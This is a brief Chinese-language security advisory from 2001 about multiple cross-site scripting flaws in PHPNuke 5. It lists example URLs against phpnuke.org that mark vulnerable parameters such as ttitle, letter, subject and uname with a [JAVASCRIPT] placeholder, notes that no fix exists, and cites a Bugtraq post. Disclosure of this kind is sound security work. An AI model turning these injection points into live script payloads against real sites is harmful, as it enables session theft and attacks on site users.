PHPNuke存在多个跨站脚本漏洞发布时间:2001-12-17 更新时间:2001-12-17 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 受影响系统 PHPNuke 5详细描述 PHPNuke存在多个跨站脚本漏洞。 测试代码 http://phpnuke.org/modules.php? name=Downloads&d_op=viewdownloaddetails&lid=0 2&ttitle=[JAVASCRIPT] http://phpnuke.org/modules.php? name=Downloads&d_op=ratedownload&lid=118&ttitle =[JAVASCRIPT] http://phpnuke.org/modules.php? op=modload&name=Members_List&file=index&letter =[JAVASCRIPT] http://phpnuke.org/submit.php?subject= [JAVASCRIPT]&story=[JAVASCRIPT]&storyext= [JAVASCRIPT]&op=Preview http://phpnuke.org/user.php?op=userinfo&uname= [JAVASCRIPT] 解决方案 尚无 相关信息 frog frog (leseulfrog@hotmail.com) 参考:http://archives.neohapsis.com/archives/bugtraq/2001-12/0156.html |